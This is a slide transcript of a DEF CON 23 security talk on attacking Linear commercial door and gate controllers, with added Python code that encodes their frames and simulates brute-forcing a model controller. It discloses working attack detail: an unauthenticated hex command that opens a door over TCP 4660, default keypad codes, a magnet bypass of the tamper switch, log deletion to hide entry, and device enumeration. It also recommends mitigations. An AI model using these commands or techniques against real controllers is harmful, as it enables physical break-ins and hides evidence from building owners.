Hacking Access Control Systems
Slide transcript (DEF CON 23)
![Page 1: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/1.jpg)
Hacking Access Control Systems: Are We Really Safe?
![Page 2: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/2.jpg)
Dennis Maldonado
Security Consultant @ KLC Consulting
Twitter: @DennisMald
Houston Locksport Co-founder http://www.meetup.com/Houston-Locksport/
![Page 3: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/3.jpg)
Agenda
Physical Access Control System
Linear Commercial Access Control Systems
Attacks: Local and Remote
Demo/Tools
Device Enumeration Techniques
Recommendations
![Page 4: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/4.jpg)
Physical Access Control Systems
![Page 5: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/5.jpg)
Physical Access Control: What do they do?
Limiting access to physical location/resource
Secure areas using:
Doors
Gates
Elevator floors
Barrier Arms
![Page 6: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/6.jpg)
Physical Access Control: How do they work?
Access control systems:
Keypad entry (entry/directory codes)
Telephone entry
Radio receivers for remotes
Proximity cards (RFID)
Swipe cards
Sensors
![Page 7: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/7.jpg)
Where are they used?
Use cases:
Gated Communities
Parking Garages
Office Buildings
Apartments
Hotels/Motels
Commercial Buildings
Recreational Facilities
Medical Facilities
![Page 8: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/8.jpg)
Doorking
![Page 9: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/9.jpg)
Chamberlain
![Page 10: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/10.jpg)
Sentex
![Page 11: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/11.jpg)
LiftMaster
![Page 12: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/12.jpg)
Nortek Security & Control/Linear Controllers
![Page 13: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/13.jpg)
![Page 14: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/14.jpg)
![Page 15: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/15.jpg)
![Page 16: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/16.jpg)
![Page 17: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/17.jpg)
![Page 18: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/18.jpg)
![Page 19: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/19.jpg)
Linear Commercial Access Control
![Page 20: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/20.jpg)
Nortek Security & Control/Linear Controllers
AE1000Plus
AE2000Plus
AM3Plus
![Page 21: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/21.jpg)
Linear Controller
Commercial Telephone Entry System
Utilizes a telephone line
Supports thousands of users
Networked with other controllers
Can be configured/controlled through a PC
Serial Connection
![Page 22: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/22.jpg)
Linear – AM-SEK TCP/IP Kit (Serial-to-TCP)
Converts Serial to Ethernet
Allows Management over TCP/IP network
Allows for remote management (over the internet)
![Page 23: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/23.jpg)
Linear – Typical Installation (diagram)
Management PC (192.168.0.40) -> Ethernet cable -> Router/Switch (192.168.0.0/24) -> Ethernet cable -> Serial-to-TCP converter (192.168.0.32:4660) -> Serial cable -> AE1000Plus Controller
![Page 24: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/24.jpg)
![Page 25: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/25.jpg)
Software - AccessBase2000
Add/remove users
Entry codes
Directory codes
Cards
Transmitters
Manually toggle relays
View log reports
Communicates through serial
Requires a password to authenticate
![Page 26: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/26.jpg)
![Page 27: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/27.jpg)
![Page 28: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/28.jpg)
PC to Controller Communication
Request: 5AA5000A1105010008000000CB97
Responses:
Acknowledged: 5AA50004110C4625
Not Acknowledged: 5AA50005110D024C23
Invalid Checksum: 5AA50005110D017EB8
No response (not authenticated)
Example exchange shown on the slide: the PC sends the password request 5AA5000A11013635343332319A71 and the controller answers 5AA50005110D024C23 (Not Acknowledged).
![Page 29: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/29.jpg)
5AA5000A11013635343332319A71
Packet layout (labels from the slide, bytes from the example above):
Packet Header: 5AA5
Minimum Data Length / Maximum Data Length: 00 0A (the two length bytes; the value 0x000A counts the net node, command, data and checksum bytes that follow it)
Net Node: 11
Command: 01 (Password = 01, Poll Status = 02, Poll Log = 03, Command = 04, Time = 05, Put Flash = 06, …)
Data (Hex): 363534333231
Checksum: 9A71
String is hex encoded: 36 35 34 33 32 31 is the ASCII password 654321
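The frame layout above is enough to build and check these packets yourself. The following encoder/decoder is an added example, not code from the talk, from ACAT, or from Linear/Nortek. The slides do not name the checksum algorithm; CRC-16/KERMIT (polynomial 0x1021 reflected as 0x8408, initial value 0, no final XOR) computed over the net node, command and data bytes reproduces every checksum printed on the slides (9A71, 4625, 4C23, 7EB8, CB97, E88D), so that is what the example uses, and it is stated here as a derivation from those samples rather than as vendor documentation. One caveat a reader should keep in mind: the relay packets on the later slides carry command byte 05, which the slide's own list would label "Time", so the example relies on the list only for Password = 01 and reports other command bytes numerically.

```python
"""
Encoder/decoder for the Linear controller frames shown on the slides.

Added example (not vendor or talk code). Field layout follows the slide's
labels: header 5AA5, 2-byte big-endian length, net node, command, data,
2-byte big-endian checksum. The checksum algorithm is inferred from the
sample packets: CRC-16/KERMIT over net node + command + data.
"""
from __future__ import annotations

from dataclasses import dataclass

HEADER = b"\x5a\xa5"
PASSWORD_CMD = 0x01  # "Password = 01" on the slide
ACK_CMD = 0x0C       # reply 5AA50004110C4625 is listed as Acknowledged
NAK_CMD = 0x0D       # reply ...0D02 is Not Acknowledged, ...0D01 is Invalid Checksum


def crc16_kermit(data: bytes) -> int:
    """CRC-16/KERMIT: poly 0x1021 reflected (0x8408), init 0, no final XOR."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc & 0xFFFF


@dataclass(frozen=True)
class Frame:
    net_node: int
    command: int
    data: bytes = b""

    def body(self) -> bytes:
        # The bytes the checksum covers: net node, command, data.
        return bytes([self.net_node, self.command]) + self.data

    def encode(self) -> bytes:
        body = self.body()
        length = len(body) + 2  # the length field also counts the 2-byte checksum
        return (HEADER + length.to_bytes(2, "big") + body
                + crc16_kermit(body).to_bytes(2, "big"))

    def hex(self) -> str:
        return self.encode().hex().upper()


def parse_frame(raw: bytes) -> Frame:
    """Decode one frame; raise ValueError on a bad header, length or checksum."""
    if len(raw) < 6 or raw[:2] != HEADER:
        raise ValueError("not a controller frame: missing 5AA5 header")
    length = int.from_bytes(raw[2:4], "big")
    if length < 4 or len(raw) != 4 + length:
        raise ValueError(f"length field {length} does not match {len(raw) - 4} trailing bytes")
    body, wire_crc = raw[4:-2], int.from_bytes(raw[-2:], "big")
    calc = crc16_kermit(body)
    if calc != wire_crc:
        raise ValueError(f"checksum mismatch: on the wire {wire_crc:04X}, computed {calc:04X}")
    return Frame(net_node=body[0], command=body[1], data=body[2:])


def parse_hex(text: str) -> Frame:
    return parse_frame(bytes.fromhex(text))


def password_frame(password: str, net_node: int = 0x11) -> Frame:
    """Command 01 with the password sent as ASCII ("String is Hex Encoded")."""
    if len(password) != 6 or not (password.isascii() and password.isdigit()):
        raise ValueError("controller passwords are exactly six numeric characters")
    return Frame(net_node, PASSWORD_CMD, password.encode("ascii"))


def describe_response(raw: bytes | None) -> str:
    """Map a controller reply onto the outcomes listed on the slide."""
    if not raw:
        return "no response (not authenticated)"
    try:
        frame = parse_frame(raw)
    except ValueError as exc:
        return f"unparseable reply ({exc})"
    if frame.command == ACK_CMD and not frame.data:
        return "acknowledged"
    if frame.command == NAK_CMD and frame.data == b"\x02":
        return "not acknowledged"
    if frame.command == NAK_CMD and frame.data == b"\x01":
        return "invalid checksum"
    return f"unrecognised reply: command {frame.command:02X}, data {frame.data.hex().upper()}"


if __name__ == "__main__":
    for label, text in [("password 654321", "5AA5000A11013635343332319A71"),
                        ("relay command", "5AA5000A1105010000080000E88D")]:
        f = parse_hex(text)
        print(f"{label}: net node {f.net_node:02X}, command {f.command:02X}, data {f.data.hex().upper()}")
    print("rebuilt password frame:", password_frame("654321").hex())
    print(describe_response(bytes.fromhex("5AA50005110D024C23")))
```

Because the checksum is a plain CRC with no key, anyone who can reach TCP 4660 can forge valid frames; the checksum protects against line noise, not against an attacker, which is the point the later slides make.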
![Page 30: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/30.jpg)
Attacks: Local and Remote Attacks
![Page 31: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/31.jpg)
So how do we target these controllers?
Physical Access
Local Programming
Serial port inside the controller
![Page 32: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/32.jpg)
Local Attacks
![Page 33: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/33.jpg)
AE-500 – Default Password
Hold 0 and 2 on the keypad
Type the default password: 123456#
Input the commands to add a new entry code
31#9999#9999#99#
Type in your new code (9999)
Access Granted!
![Page 34: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/34.jpg)
Keypad sequence, annotated: 123456# (enter programming mode), 31# (new entry code), 9999# (enter entry code), 9999# (confirm new entry code), 99# (exit programming mode)
![Page 35: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/35.jpg)
![Page 36: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/36.jpg)
Master Key
Same key for all AE1000Plus and AM3Plus controllers
Purchase them from a supplier or on eBay
Or just pick the lock
Full access to the device
![Page 37: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/37.jpg)
![Page 38: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/38.jpg)
Physical Access
Manual Relay Latch buttons
Toggle Relay
Lock their state
Programming buttons
Program device locally
Erase Memory
Active Phone Line
Serial connection to the controller
![Page 39: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/39.jpg)
Tamper Monitoring?
Magnetic tamper switch inside enclosure
No active alerts
Can be bypassed by placing a magnet on the outside of the enclosure
![Page 40: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/40.jpg)
![Page 41: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/41.jpg)
![Page 42: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/42.jpg)
So how do we target these controllers?
Physical Access
Local Programming
Serial port inside the controller
Internal Network Access
IP of Serial-to-TCP device, TCP port 4660 (e.g. 192.168.0.32:4660)
External Network Access
IP of Serial-to-TCP device, TCP port 4660 open to the internet (e.g. 74.12.x.x:4660)
Diagram: the attacker ("Bad Guy") sends the password request 5AA5000A11013635343332319A71 to either address and receives 5AA50005110D024C23 (Not Acknowledged) back.
![Page 43: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/43.jpg)
Remote Attacks
![Page 44: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/44.jpg)
Demo
![Page 45: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/45.jpg)
Brute-force attack
No rate limiting
No password lockout
Small key space
Exactly 6 characters
Numeric only
Scriptable
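To see what "no rate limiting, no lockout, six numeric characters" means in time rather than in adjectives, here is an added example that plays the brute force out against an in-process stand-in for the controller's password check. It is not the talk's tool and the controller model is constructed for the example; the 50 attempts per second used below is an assumed throughput for a serial-to-TCP link, not a measured one. The same loop is run once against a model with no lockout and once against one that locks after five failures, which is the change a vendor would make.

```python
"""
Brute-force arithmetic from the slide (exactly 6 numeric characters, no rate
limit, no lockout) against a constructed controller model. Added example;
the model stands in for the real password check and the attempt rate is an
assumption.
"""
from __future__ import annotations

from typing import Iterator, Optional, Tuple

KEY_SPACE = 10 ** 6          # exactly six characters, numeric only
DEFAULT_PASSWORD = "123456"  # default shown on the keypad slide; always try it first


class ControllerModel:
    """Stand-in for the controller: answers 'ack' or 'nak' like the real frames do.

    max_failures/lockout_seconds add the lockout the real controller lacks.
    """

    def __init__(self, password: str, max_failures: Optional[int] = None,
                 lockout_seconds: float = 0.0) -> None:
        self.password = password
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.failures = 0
        self.locked_until = 0.0

    def authenticate(self, attempt: str, now: float) -> str:
        if now < self.locked_until:
            return "locked"
        if attempt == self.password:
            self.failures = 0
            return "ack"
        self.failures += 1
        if self.max_failures is not None and self.failures >= self.max_failures:
            self.failures = 0
            self.locked_until = now + self.lockout_seconds
        return "nak"


def candidates() -> Iterator[str]:
    """Default password first, then the whole numeric key space in order."""
    yield DEFAULT_PASSWORD
    for n in range(KEY_SPACE):
        code = f"{n:06d}"
        if code != DEFAULT_PASSWORD:
            yield code


def brute_force(ctrl: ControllerModel, rate_per_second: float) -> Tuple[Optional[str], int, float]:
    """Return (password or None, attempts made, simulated seconds elapsed).

    Gives up at the first 'locked' reply, which is exactly the behaviour a
    lockout is meant to force on an attacker.
    """
    now = 0.0
    attempts = 0
    for code in candidates():
        attempts += 1
        reply = ctrl.authenticate(code, now)
        if reply == "ack":
            return code, attempts, now
        if reply == "locked":
            return None, attempts, now
        now += 1.0 / rate_per_second
    return None, attempts, now


def worst_case_seconds(rate_per_second: float, max_failures: Optional[int] = None,
                       lockout_seconds: float = 0.0) -> float:
    """Time to exhaust the key space, adding one lockout per max_failures failures."""
    base = KEY_SPACE / rate_per_second
    if max_failures is None:
        return base
    return base + (KEY_SPACE // max_failures) * lockout_seconds


if __name__ == "__main__":
    rate = 50.0  # assumed attempts per second over the serial-to-TCP link
    found, tries, secs = brute_force(ControllerModel("000123"), rate)
    print(f"no lockout: found {found} after {tries} attempts, {secs:.2f} s")
    found, tries, secs = brute_force(ControllerModel("000123", max_failures=5, lockout_seconds=300), rate)
    print(f"5-failure lockout: found {found} after {tries} attempts, {secs:.2f} s")
    print(f"worst case, no lockout: {worst_case_seconds(rate) / 3600:.1f} h")
    print(f"worst case, 5 failures then 5 min lockout: {worst_case_seconds(rate, 5, 300) / 86400:.0f} days")
```

At the assumed 50 attempts per second the whole space takes under six hours with no lockout; the same five-failure, five-minute lockout turns that into years, which is why "if networked, utilize authentication" on the recommendations slide is only half the fix.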
![Page 46: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/46.jpg)
Demo
![Page 47: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/47.jpg)
No Password Necessary
Authentication not enforced!
Send unauthenticated commands
Any commands will execute
May not get any confirmation data
Diagram: Hacker -> raw connection -> AE1000Plus Controller
![Page 48: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/48.jpg)
Open Doors Remotely
Send one simple command: 5AA5000A1105010000080000E88D
Triggers a relay for 2 seconds, thus opening a door or gate
Great for movie style scenes
Diagram: Hacker -> raw connection carrying 5AA5000A1105010000080000E88D -> AE1000Plus Controller -> Door 1: Access Granted
![Page 49: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/49.jpg)
Lock Doors Open/Closed
Keeps Doors/Gates open or closed
Will not respond to user input (RFID cards, remotes, etc)
Persists until manually unlocked or rebooted
![Page 50: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/50.jpg)
Delete Logs From The Controller
Controller keeps logs of events
Downloading logs deletes them from the controller
Hide evidence of entry or tampering
![Page 51: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/51.jpg)
Change the Password
Upload configuration settings
Change password without needing the previous password
Normal functionality remains
Upload other configuration changes
![Page 52: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/52.jpg)
Denial of Service
A fake database update disables the controller the next time it is connected to or rebooted
Overwrite device firmware
Lock relays to prevent access
![Page 53: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/53.jpg)
ACAT – Access Control Attack Tool Demo
![Page 54: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/54.jpg)
Locating Controllers
![Page 55: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/55.jpg)
Device Enumeration Techniques
Scan the network
Look for any COM port redirectors (default port = TCP 4660)
Send a broadcast packet to UDP 55954; devices will respond
Send a password request string to port 4660: 5AA5000A11013635343332319A71
Replies seen: 5AA50004110C4625 (Acknowledged) or 5AA50005110D024C23 (Not Acknowledged)
Diagram: UDP broadcast -> broadcast response; password request -> client response
![Page 56: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/56.jpg)
Demo
![Page 57: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/57.jpg)
Recommendations
Always change the default password
Change physical locks
Use a direct serial connection
If networked, utilize authentication
Resist opening the controller to the internet
![Page 58: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/58.jpg)
Final Thoughts
Other vendors
Ongoing research
Tool – more work is needed; located at https://github.com/linuz/Access-Control-Attack-Tool
It’s currently just a prototype
Continue updating it/take it out of “PoC mode”
Working on an Nmap script
Slides uploaded to SlideShare
www.slideshare.net/DennisMaldonado5
![Page 59: Hacking Access Control Systems](https://reader035.vdocuments.us/reader035/viewer/2022062515/55d0d445bb61eb290e8b483a/html5/thumbnails/59.jpg)
Questions?
If you have any questions, you can: Twitter: @DennisMald
Find me here at DEFCON23
Email me at: [email protected]